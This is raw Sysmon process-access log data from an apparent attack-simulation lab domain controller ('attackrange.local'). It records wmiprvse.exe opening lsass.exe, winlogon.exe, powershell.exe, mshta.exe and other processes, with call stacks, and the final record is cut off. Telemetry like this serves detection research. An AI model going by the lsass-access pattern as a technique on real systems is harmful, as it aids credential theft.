15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 